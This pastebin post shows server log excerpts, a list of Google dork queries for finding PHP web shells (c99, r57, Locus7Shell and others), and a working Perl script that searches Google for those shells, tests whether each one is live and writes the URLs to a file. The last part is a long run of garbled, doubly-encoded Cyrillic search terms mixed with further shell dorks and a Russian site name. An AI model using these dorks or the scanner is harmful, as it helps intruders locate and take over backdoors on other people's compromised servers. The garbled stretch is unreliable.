pastebin - collaborative debugging

pastebin is a collaborative debugging tool allowing you to share and modify code snippets while chatting on IRC, IM or a message board.

This site is developed to XHTML and CSS2 W3C standards. If you see this paragraph, your browser does not support those standards and you need to upgrade. Visit WaSP for a variety of options.

PHP pastebin - collaborative debugging tool View Help


Posted by maxhex on Sun 19 Oct 20:16
report abuse | View followups from Anonymous, vxx9com, pekok and asd | download | new post

  1.  
  2.                    root:nobody in logs
  3.  
  4.  
  5. > [/var/log/auth.log]
  6. >
  7. > Sep 13 05:15:01 serv CRON[6665]: (pam_unix) session opened for user root by
  8. > (uid=0)
  9. >
  10. > Sep 13 05:15:01 serv su[6686]: + ??? root:nobody
  11. >
  12. > Sep 13 05:15:01 serv su[6686]: (pam_unix) session opened for user nobody by
  13. > (uid=0)
  14. >
  15. > Sep 13 05:15:05 serv CRON[6665]: (pam_unix) session closed for user root
  16.  
  17.                  ---------------------------------
  18.  
  19.           And what are we supposed to think about it?
  20.  
  21.  
  22. > [/var/log/messages]
  23. >
  24. > Sep 13 04:41:48 serv kernel: New not syn:IN=eth1 OUT=
  25. > MAC=00:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx SRC=60.xx.xx.xx
  26. > DST=192.168.0.1 LEN=48 TOS=0x00 PREC=0x00 TTL=102 ID=7224 PROTO=TCP SPT=80
  27. > DPT=64585 WINDOW=16384 RES=0x00 ACK SYN URGP=0
  28. >
  29. > Sep 13 05:15:05 router syslogd 1.4.1#17: restart.
  30.  
  31.  
  32. ==============================================================
  33.  
  34.  
  35.  
  36. ===================================================
  37.  
  38. search site: c99.php
  39. ============================
  40.  
  41. d=99(nobody) gid=99(nobody) groups=99(nobody)Safe-mode: OFF (not secure)
  42.  
  43.  
  44. =================================
  45.  
  46. c99.php =ls
  47.  
  48. ===============================
  49.  
  50. (root)|root&
  51.  
  52. ===========================
  53.  
  54. (root-0-999)|N765-30-10|0
  55.  
  56. ====================
  57.  
  58.  
  59. (root)%7croot&
  60.  
  61. ========================
  62.  
  63. root root drwx
  64.  
  65. ============================
  66. PostgreSQL: OFF c99.php
  67. ======================
  68.  
  69. powered by Captain Crunch Security Team inurl:/c99.php
  70.  
  71.  
  72.  
  73. inurl:/c99.php C99Shell v. 1.0 pre-release build #12 C99Shell v.
  74.  
  75.  
  76. -----------------------------
  77.  
  78. allintext: [ ] [ SQL ] [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]
  79.  
  80. =============================================================
  81.  
  82. c99.php Safe-mode: OFF (not secure) 19.09.2008
  83.  
  84. ========================================
  85.  
  86. intitle:!C99Shell v. 1.0 pre-release build #16! root
  87.  
  88. (r
  89.  
  90.  
  91. root c99.php
  92.  
  93. inurl:c99.php uid=0(root)
  94.  
  95. c99 shell v.1.0 (roots)
  96.  
  97.  
  98. intitle:"c99shell" filetype:php root
  99.  
  100.  
  101.  
  102. !C99Shell v. 1.0 pre-release build #16! root !!~~
  103.  
  104.  
  105. search site:  uid=0(root) Safe-mode: OFF
  106.  
  107.  
  108. =======================================================
  109.  
  110. inurl:c99.php Safe-mode: OFF (not secure)
  111. ili
  112. inurl:c99.php Safe-mode: ON
  113. ili
  114. inurl:r57.php Safe_mode: OFF
  115. ili
  116. inurl:r57.php Safe_mode: ON
  117. ili
  118. intitle:.com - phpshell
  119. ili
  120. intitle:.org - phpshell
  121. ili
  122. inurl:.com - ashshell
  123. ili
  124. intitle:.org - Locus7Shell
  125. ili
  126. intitle:.com - Locus7Shell
  127. ========================================================
  128.  
  129.  
  130. c99.php  root/root
  131.  
  132.  
  133. ============================
  134.  
  135.  
  136. lrwxrwxrwx 1 root root
  137.  
  138.  
  139. =================================
  140.  
  141. Owned by hacker
  142.  
  143.  
  144.  
  145. ===================================
  146.  
  147.  
  148.  
  149. #!/usr/bin/perl
  150.  
  151. use strict;
  152. use warnings;
  153. use LWP::UserAgent;
  154.  
  155. usage() unless $ARGV[2];
  156.  
  157. my @searchTerm;
  158. my @checkTerm;
  159.  
  160. if(lc($ARGV[0]) eq "r57") {
  161.         push(@searchTerm, "inurl:r57.php");
  162.         push(@searchTerm, "\"[ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]\"");
  163.         push(@searchTerm, "intitle:r57shell");
  164.         push(@checkTerm, "r57");
  165.         push(@checkTerm, "safe_mode");
  166. } elsif(lc($ARGV[0]) eq "c99") {
  167.         push(@searchTerm, "inurl:c99.php");
  168.         push(@searchTerm, "\"Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout\"");
  169.         push(@searchTerm, "intitle:\" - phpshell\"");
  170.         push(@searchTerm, "intitle:\" - c99shell\"");
  171.         push(@checkTerm, "c99");
  172.         push(@checkTerm, "Safe-mode");
  173. } elsif(lc($ARGV[0]) eq "mys") {
  174.         push(@searchTerm, "\"Auto error traping enabled\"");
  175.         push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\"");
  176.         push(@checkTerm, "MyShell");
  177.         push(@checkTerm, "Echo commands");
  178. } elsif(lc($ARGV[0]) eq "phs") {
  179.         push(@searchTerm, "intitle:\"PHP Shell 1.5\"");
  180.         push(@searchTerm, "intitle:\"PHP Shell 1.6\"");
  181.         push(@searchTerm, "intitle:\"PHP Shell 1.7\"");
  182.         push(@searchTerm, "\"Enable stderr-trapping?\"");
  183.         push(@checkTerm, "PHP Shell");
  184.         push(@checkTerm, "Choose new working");
  185. } elsif(lc($ARGV[0]) eq "phm") {
  186.         push(@searchTerm, "\"PHPShell by Macker\"");
  187.         push(@searchTerm, "\"[ Main Menu ]      [ PHPKonsole ]      [ Haxplorer ]\"");
  188.         push(@checkTerm, "Haxplorer");
  189.         push(@checkTerm, "PHPKonsole");
  190. } elsif(lc($ARGV[0]) eq "rem") {
  191.         push(@searchTerm, "intitle:\"phpRemoteView: \"");
  192.         push(@searchTerm, "\"REMVIEW TOOLS\"");
  193.         push(@checkTerm, "phpRemoteView");
  194.         push(@checkTerm, "perms");
  195. }
  196.  
  197. if(!@searchTerm) {
  198.         print "Error: [shell to find] is a unknown shell\n" and die;
  199. }
  200.  
  201. my $outputOn;
  202.  
  203. if(lc($ARGV[1]) eq "on") {
  204.         $outputOn = 1;
  205. } elsif(lc($ARGV[1]) eq "off") {
  206.         $outputOn = 0;
  207. } else {
  208.         print "Error: [screen output] must be \"on\" or \"off\"\n" and die;
  209. }
  210.  
  211. my $outputFile;
  212.  
  213. if(index(lc($ARGV[2]), ".htm") > 0) {
  214.         $outputFile = $ARGV[2];
  215. } else {
  216.         print "Error: [output HTML file] must be *.htm or *.html\n" and die;
  217. }
  218.  
  219. open(FILEHANDLE, ">$outputFile");
  220. print FILEHANDLE "\n";
  221. close FILEHANDLE;
  222.  
  223. my $userAgent = LWP::UserAgent->new;
  224. $userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");
  225.  
  226. my @resultLinks;
  227.  
  228. foreach(@searchTerm) {
  229.         print "[*] Query for \"$_\"\n" if($outputOn == 1);
  230.        
  231.         my $isLastPage = 0;
  232.        
  233.         for(my $gPage = 0; ; $gPage++) {
  234.                 if($isLastPage == 1) { last; }
  235.                
  236.                 my $gRequest =  HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
  237.                 my $gResource = $userAgent->request($gRequest);
  238.                
  239.                 if($gResource->is_success) {
  240.                         my @gContent = split("
  241. ", $gResource->content);
  242.                         if(@gContent < 10) { $isLastPage = 1; };
  243.                        
  244.                         for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) {
  245.                                 my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6);
  246.                                 $shellLink = substr($shellLink, 0, index($shellLink, "\""));
  247.                                
  248.                                 print "[*] Check status of site \"$shellLink\"\n" if($outputOn == 1);
  249.                                
  250.                                 my $sRequest = HTTP::Request->new(GET => $shellLink);
  251.                                 my $sResource = $userAgent->request($sRequest);
  252.                                
  253.                                 if($sResource->is_success) {
  254.                                         if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
  255.                                                 open(FILEHANDLE, ">>$outputFile");
  256.                                                 print FILEHANDLE "Link: $shellLink
  257. \n";
  258.                                                 print FILEHANDLE "Search Term: $_
  259.  
  260. \n";
  261.                                                 close FILEHANDLE;
  262.                                                
  263.                                                 print "[+] Found shell: $shellLink\n" if($outputOn == 1);
  264.                                         } else {
  265.                                                 print "[-] No shell\n" if($outputOn == 1);
  266.                                         }
  267.                                 } else {
  268.                                         print "[-] Offline\n" if($outputOn == 1);
  269.                                 }
  270.                         }
  271.                        
  272.                         sleep 20; #wait 20 seconds so google dont think we are a bot
  273.                 } else {
  274.                         print "Unable to query google\n" and die;
  275.                 }
  276.         }
  277. }
  278.  
  279. open(FILEHANDLE, ">>$outputFile");
  280. print FILEHANDLE "
  281.  
  282. Find PHP Shells via Google - by DiA/RRLF
  283. ";
  284. close FILEHANDLE;
  285.  
  286. sub usage {
  287.         print qq(
  288. Find PHP Shells via Google - by DiA/RRLF (http://www.vx-dia.de.vu)
  289.        
  290. Usage:   perl $0 [shell to find] [screen output] [output HTML file]
  291.                   [shell to find] can be:
  292.                         r57 - find r57shell
  293.                         c99 - find c99shell
  294.                         mys - find MyShell
  295.                         phs - find PHP Shell
  296.                         phm - find PHPShell (Macker)
  297.                         rem - find phpRemoteView
  298.                   [screen output] can be:
  299.                         on  - every step the script doas get printed on the screen
  300.                         off - no output, the script just writes to the output file
  301.                  [output HTML file] must be:
  302.                         *.htm or *.html
  303.                                                            
  304. Example: perl $0 c99 on c99shells.htm
  305.          perl $0 mys off manyshells.htm
  306.  
  307. )       and exit;
  308. }
  309.  
  310.  
  311. =============================================================
  312.  
  313.  
  314.  
  315.                         &#1583;&#1608;&#1585;&#1603;&#1575;&#1578; &#1588;&#1604;99 &#1576;&#1575;&#1604;&#1585;&#1608;&#1587;&#1610;
  316.  
  317.                                      
  318.  
  319. intitle:c99shell uname
  320.  
  321. &#1072;&#1083;&#1090;&#1072;&#1081;&#1089;&#1082;&#1072;&#1103; &#1082;&#1088;&#1091;&#1075;&#1086;&#1089;&#1074;&#1077;&#1090;&#1082;&#1072;
  322.  
  323. c99shell [file on secure ok ]
  324.  
  325. intitle:C99Shell v. 1.0 pre-release uname
  326.  
  327. 7          1.93%  &#1086;&#1073;&#1086;&#1080; &#1076;&#1083;&#1103; &#1088;&#1072;&#1073;&#1086;&#1095;&#1077;&#1075;&#1086; &#1089;&#1090;&#1086;&#1083;&#1072;
  328.  
  329. c99shell v. 1.0 pre-release build
  330. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249; &#1057;&#8222;&#1056;&#1109;&#1057;&#1026;&#1057;&#1107;&#1056;&#1112;
  331. &#1056;&#1038;&#1056;&#1111;&#1056;»&#1056;°&#1056;&#1030; &#1056;&#1116;&#1056;&#1105;&#1056;¶&#1056;&#1029;&#1057;&#1039;&#1057;&#1039; &#1056;&#1113;&#1056;°&#1057;&#8218;&#1057;&#1107;&#1056;&#1029;&#1057;&#1034;
  332. c99shell drwxr
  333. c99shell safe mode
  334. &#1057;&#8225;&#1057;&#8218;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1057;&#1027; &#1057;&#1027;&#1056;&#1109;&#1056;±&#1056;&#1109;&#1056;&#8470; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  335. &#1044;&#1086;&#1088;&#1086;&#1075;&#1072; &#1085;&#1072; &#1059;&#1082;&#1086;&#1082;
  336. &#1087;&#1077;&#1088;. &#1041;&#1086;&#1075;&#1086;&#1084;&#1091;&#1102;&#1079;
  337. C99Shell v. 1.0
  338.  
  339. Encoder Tools Proc.FTP brute Sec.SQL PHP-code
  340. c99shell uname
  341. com_simplefaq
  342. uname -a: Linux c99shell
  343. www.altair-altai.ru
  344. &#1056;&#8216;&#1056;&#1105;&#1056;»&#1056;µ&#1057;&#8218;&#1057;&#8249; &#1056;&#1169;&#1056;&#1109; &#1056;&#8216;&#1056;°&#1057;&#1026;&#1056;&#1029;&#1056;°&#1057;&#1107;&#1056;»&#1056;°
  345. &#1056;°&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;
  346. &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108; &#1056;&#1108;&#1056;&#1109;&#1056;&#1029;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  347. &#1095;&#1090;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  348. BBCode &#1056;&#1030;&#1056;&#1108;&#1056;»&#1057;&#1035;&#1057;&#8225;&#1056;µ&#1056;&#1029;
  349. C99Shell v. 1.0 pre-release uname
  350. altair-altai.ru
  351. c99shell
  352. c99shell safe mode:ON
  353. c99shell.php v.1.0... 2008
  354. free c99shell
  355. intitle:!C99Shell v. 1.0 pre-release build #16! root
  356. intitle:- c99shell
  357. &#1043;&#1086;&#1088;&#1103;&#1095;&#1080;&#1081; &#1082;&#1083;&#1102;&#1095; &#1061;&#1072;&#1082;&#1072;&#1089;&#1080;&#1103;
  358. &#1055;&#1086;&#1080;&#1089;&#1082; &#1087;&#1086;&#1087;&#1091;&#1090;&#1095;&#1080;&#1082;&#1086;&#1074; &#1040;&#1083;&#1090;&#1072;&#1081;
  359. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  360. &#1056;&#1115;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218;&#1057;&#8249; &#1057;&#1027;&#1056;&#1111;&#1056;»&#1056;°&#1056;&#1030;&#1056;&#1109;&#1056;&#1030; &#1056;&#1111;&#1056;&#1109; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1057;&#1035; 3 &#1056;&#1108;.&#1057;&#1027;.
  361. &#1056;&#1030;&#1057;&#8249;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ 12 &#1056;&#1105;&#1057;&#1035;&#1056;&#1029;&#1057;&#1039;
  362. &#1056;&#1169;&#1057;&#1036;&#1057;&#1107;-&#1056;&#1169;&#1056;°&#1056;&#1112;&#1056;°&#1057;&#1027;&#1056;&#1108;
  363. &#1056;&#1109;&#1057;&#8218;&#1057;&#8225;&#1056;µ&#1057;&#8218; &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  364. &#1059;&#1047;&#1059;&#1050;&#1040;
  365. &#1063;&#1058;&#1054; &#1042;&#1047;&#1071;&#1058;&#1068; &#1057; &#1057;&#1054;&#1041;&#1054;&#1049; &#1042; &#1055;&#1054;&#1061;&#1054;&#1044;
  366. &#1063;&#1090;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1089; &#1089;&#1086;&#1073;&#1086;&#1081; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  367. &#1074;&#1077;&#1083;&#1086;&#1089;&#1080;&#1087;&#1077;&#1076;&#1085;&#1099;&#1077; &#1087;&#1086;&#1093;&#1086;&#1076;&#1099;
  368. &#1083;&#1099;&#1078;&#1085;&#1099;&#1081; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;
  369. &#1086;&#1073;&#1086;&#1080; &#1088;&#1072;&#1073;&#1086;&#1095;&#1077;&#1075;&#1086; &#1089;&#1090;&#1086;&#1083;&#1072;
  370. &#1086;&#1089;&#1086;&#1073;&#1077;&#1085;&#1085;&#1086;&#1089;&#1090;&#1080; &#1083;&#1099;&#1078;&#1085;&#1086;&#1075;&#1086; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;&#1072;
  371. &#1090;&#1091;&#1088; &#1041;&#1072;&#1088;&#1085;&#1072;&#1091;&#1083;-&#1089;. &#1059;&#1089;&#1090;&#1100; -&#1050;&#1072;&#1085; -&#1057; &#1052;&#1077;&#1085;&#1076;&#1091;&#1088;-&#1057;&#1086;&#1082;&#1082;&#1086;&#1085;-&#1052;&#1091;&#1083;&#1100;&#1090;&#1080;&#1085;&#1089;&#1082;&#1080;&#1077; &#1086;&#1079;&#1077;&#1088;&#1072;
  372. &#1103;&#1079;&#1075;&#1091;&#1083;&#1103;&#1084;
  373. !C99Shell v. 1.0 pre
  374. -c99shell
  375. 2008 &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169; &#1056;¤&#1056;°&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1110;&#1056;&#1109;&#1057;&#1026;&#1057;&#8249;
  376. =*-*c99shell
  377. C99Shell v. 1.0 pre-release build #16
  378. C99Shell v. 1.0 pre-release build Safe-mode: OFF (not secure)
  379. C99Shell v. 1.4 pre-release build
  380. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update
  381. Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback
  382. c99 shell pre-release safe mode:off not secure
  383. c99Shell Unselect
  384. c99Shell drwxr-xr-x
  385. c99shell *ok*
  386. c99shell 1.4
  387. c99shell Apache
  388. c99shell Make Dir [ok]
  389. c99shell apache
  390. c99shell drwx
  391. c99shell php uname
  392. c99shell powered by Captain Crunch Security Team
  393. c99shell powered by captain crunch security team
  394. c99shell safe mode uname
  395. c99shell v 1.0
  396. c99shell v 1.0 pre release build
  397. c99shell v. 1.0 pre-release build #16 powered by captain crunch
  398. cih.ms
  399. filetype: c99shell
  400. http://www.altair-altai.ru/content/view/25/42/
  401. intext:owned by hacker
  402. intitle:c99shell root
  403. ok c99shell uname
  404. uname-a: linux c99shell 2008
  405. www.altair-altay.ru
  406. www/altair-altai/ru
  407. &#1040;&#1051;&#1068;&#1058;&#1040;&#1048;&#1056;-&#1040;&#1051;&#1058;&#1040;&#1049;
  408. &#1040;&#1073;&#1072;&#1082;&#1072;&#1085;&#1089;&#1082;&#1080;&#1081; &#1093;&#1088;&#1077;&#1073;&#1077;&#1090; &#1040;&#1083;&#1090;&#1072;&#1081;&#1089;&#1082;&#1086;&#1075;&#1086; &#1082;&#1088;&#1072;&#1103;
  409. &#1040;&#1083;&#1090;&#1072;&#1081;
  410. &#1040;&#1083;&#1100;&#1090;&#1072;&#1080;&#1088; &#1040;&#1083;&#1090;&#1072;&#1081;
  411. &#1040;&#1083;&#1100;&#1090;&#1072;&#1080;&#1088;-&#1072;&#1083;&#1090;&#1072;&#1081;
  412. &#1042;&#1089;&#1077; &#1095;&#1090;&#1086; &#1085;&#1091;&#1078;&#1085;&#1086; &#1074;&#1079;&#1103;&#1090;&#1100; &#1074; &#1087;&#1086;&#1093;&#1086;&#1076;
  413. &#1044;&#1086;&#1083;&#1080;&#1085;&#1072; &#1052;&#1091;&#1084;&#1084;&#1080;-&#1058;&#1088;&#1086;&#1083;&#1083;&#1077;&#1081; &#1092;&#1086;&#1090;&#1086;
  414. &#1044;&#1086;&#1083;&#1080;&#1085;&#1072; &#1052;&#1091;&#1084;&#1084;&#1080;-&#1058;&#1088;&#1086;&#1083;&#1083;&#1077;&#1081; &#1092;&#1086;&#1090;&#1086;&#1075;&#1088;&#1072;&#1092;&#1080;&#1080;
  415. &#1047;&#1072;&#1073;&#1088;&#1086;&#1089;&#1082;&#1072; &#1085;&#1072; &#1040;&#1083;&#1090;&#1072;&#1077;
  416. &#1050;&#1072;&#1082; &#1089;&#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1090;&#1100; &#1084;&#1077;&#1085;&#1102; &#1085;&#1072; 20&#1095;&#1077;&#1083; &#1087;&#1086;&#1093;&#1086;&#1076;&#1085;&#1086;&#1075;&#1086; &#1087;&#1083;&#1072;&#1085;&#1072; &#1085;&#1072; 3 &#1076;&#1085;&#1103;
  417. &#1050;&#1086;&#1085;&#1085;&#1099;&#1077; &#1090;&#1091;&#1088;&#1099; &#1074; &#1040;&#1073;&#1072;&#1082;&#1072;&#1085;&#1077;
  418. &#1051;&#1099;&#1078;&#1085;&#1099;&#1081; &#1090;&#1091;&#1088;&#1080;&#1079;&#1084;
  419. &#1054;&#1041;&#1054;&#1048; &#1053;&#1040; &#1056;&#1040;&#1041;&#1054;&#1063;&#1048;&#1049; &#1057;&#1058;&#1054;&#1051;
  420. &#1054;&#1073;&#1086;&#1080; &#1076;&#1083;&#1103; &#1088;&#1072;&#1073;&#1086;&#1095;&#1077;&#1075;&#1086; &#1089;&#1090;&#1086;&#1083;&#1072;
  421. &#1056;&#1106;&#1056;&#8250;&#1056;&#1118;&#1056;&#1106;&#1056;&#8482; &#1056;&#1025;&#1056;&#1106;&#1056;&#8217;&#1056;&#8250;&#1056;&#65533;&#1056;&#1116;&#1056;&#1038;&#1056;&#1113;&#1056;&#65533;&#1056;&#8226; &#1056;&#1115;&#1056;&#8212;&#1056;&#8226;&#1056; &#1056;&#1106;
  422. &#1056;&#1106;&#1056;&#8250;&#1056;¬&#1056;&#1118;&#1056;&#1106;&#1056;&#65533;&#1056;  &#1056;&#1106;&#1056;&#8250;&#1056;&#1118;&#1056;&#1106;&#1056;&#8482;
  423. &#1056;&#1106;&#1056;&#1030;&#1057;&#8218;&#1056;&#1109;&#1056;&#1112;&#1056;&#1109;&#1056;±&#1056;&#1105;&#1056;»&#1057;&#1034;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249; &#1056;&#1111;&#1056;&#1109; &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1057;&#1035;
  424. &#1056;&#1106;&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249; &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  425. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1025;&#1056;°&#1056;&#1030;&#1056;»&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1109;&#1056;·&#1056;µ&#1057;&#1026;&#1056;° &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;
  426. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249;
  427. &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;-&#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1057;&#8249;
  428. &#1056;&#1106;&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;-&#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  429. &#1056;&#1106;&#1056;»&#1057;&#1034;&#1057;&#8218;&#1056;°&#1056;&#1105;&#1057;&#1026;-&#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470;
  430. &#1056;&#8216;&#1056;&#1109;&#1057;&#1026;&#1056;&#1109;&#1056;&#1030;&#1057;&#8224;&#1056;&#1109;&#1056;&#1030;
  431. &#1056;&#8216;&#1057;&#1026;&#1056;°&#1057;&#8218;&#1057;&#1034;&#1057;&#1039; &#1056;&#8220;&#1056;&#1109;&#1056;&#1030;&#1056;&#1109;&#1057;&#1026; &#1056;&#1111;&#1056;»&#1056;°&#1057;&#8218;&#1056;&#1109; &#1057;&#1107;&#1056;&#1108;&#1056;&#1109;&#1056;&#1108; &#1057;&#1027;&#1057;&#8218;&#1056;&#1109;&#1056;&#1105;&#1056;&#1112;&#1056;&#1109;&#1057;&#1027;&#1057;&#8218;&#1057;&#1034;
  432. &#1056;&#8217;&#1057;&#1027;&#1057;&#8216; &#1056;&#1169;&#1056;»&#1057;&#1039; &#1056;&#1030;&#1056;µ&#1056;»&#1056;&#1109;&#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112;&#1056;°
  433. &#1056;&#8212;&#1056;°&#1056;±&#1057;&#1026;&#1056;&#1109;&#1057;&#1027;&#1056;&#1108;&#1056;° &#1056;&#1029;&#1056;° &#1056;&#1030;&#1056;µ&#1057;&#1026;&#1057;&#8230;&#1056;&#1029;&#1057;&#1035;&#1057;&#1035; &#1056;&#1113;&#1056;°&#1057;&#8218;&#1057;&#1107;&#1056;&#1029;&#1057;&#1034;
  434. &#1056;&#1113;&#1057;&#1107;&#1056;&#1169;&#1056;° &#1056;&#1112;&#1056;&#1109;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1057;&#1027;&#1056;&#1169;&#1056;µ&#1056;»&#1056;°&#1057;&#8218;&#1057;&#1034; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1057;&#1107;&#1057;&#1035; &#1057;&#1026;&#1056;°&#1056;&#1169;&#1056;&#1105;&#1056;°&#1056;»&#1056;&#1108;&#1057;&#1107;
  435. &#1056;&#1114;&#1056;&#1109;&#1056;»&#1056;&#1109;&#1056;&#1169;&#1056;°&#1056;&#1030;&#1056;&#1108;&#1056;&#1105;&#1056;&#1029;
  436. &#1056;&#1119;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1056;&#1111;&#1056;µ&#1057;&#1027;&#1056;&#1029;&#1056;&#1105;
  437. &#1056;&#1119;&#1057;&#1107;&#1057;&#8218;&#1056;µ&#1057;&#8364;&#1056;µ&#1057;&#1027;&#1057;&#8218;&#1056;&#1030;&#1056;&#1105;&#1056;µ &#1056;&#1111;&#1056;&#1109; &#1057;&#1027;&#1057;&#1026;&#1056;µ&#1056;&#1169;&#1056;&#1029;&#1056;µ&#1056;&#8470; &#1056;°&#1056;·&#1056;&#1105;&#1056;&#1105;
  438. &#1056;&#1038;&#1056;°&#1056;&#1030;&#1057;&#1107;&#1057;&#8364;&#1056;&#1108;&#1056;&#1105;
  439. &#1056;&#1118;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1057;&#1027;&#1057;&#8218;&#1056;&#1105;&#1057;&#8225;&#1056;µ&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;&#8470; &#1056;&#1108;&#1056;»&#1057;&#1107;&#1056;±
  440. &#1056;§&#1057;&#8218;&#1056;&#1109; &#1056;&#1029;&#1057;&#1107;&#1056;¶&#1056;&#1029;&#1056;&#1109; &#1056;&#1030;&#1056;·&#1057;&#1039;&#1057;&#8218;&#1057;&#1034; &#1056;&#1030; &#1056;&#1111;&#1056;&#1109;&#1057;&#8230;&#1056;&#1109;&#1056;&#1169;
  441. &#1056;&#1025;&#1056;°&#1056;&#1030;&#1056;»&#1056;&#1105;&#1056;&#1029;&#1057;&#1027;&#1056;&#1108;&#1056;&#1105;&#1056;µ &#1056;&#1109;&#1056;·&#1056;µ&#1057;&#1026;&#1056;°
  442. &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; or &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;µ &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1057;&#8249;
  443. &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; &#1056;&#1029;&#1056;° &#1056;&#1106;&#1056;»&#1057;&#8218;&#1056;°&#1056;µ
  444. &#1056;°&#1056;&#1108;&#1057;&#8218;&#1056;&#1105;&#1056;&#1030;&#1056;&#1029;&#1057;&#8249;&#1056;&#8470; &#1057;&#8218;&#1057;&#1107;&#1057;&#1026;&#1056;&#1105;&#1056;·&#1056;&#1112; &#1056;&#1111;&#1056;µ&#1057;&#8364;&#1056;&#1105;&#1056;&#8470;
  445. &#1056;°&#1056;»&#1057;&#8218;&#1056;°&#1056;&#8470; &#1056;&#1112;&#1056;°&#1057;&#1026;&#1057;&#8364;&#1057;&#1026;&#1057;&#1107;&#1057;&#8218; 77 &#1057;&#8218;&#1056;µ&#1056;»&#1056;µ&#1057;&#8224;&#1056;&#1108;&#1056;&#1109;&#1056;µ
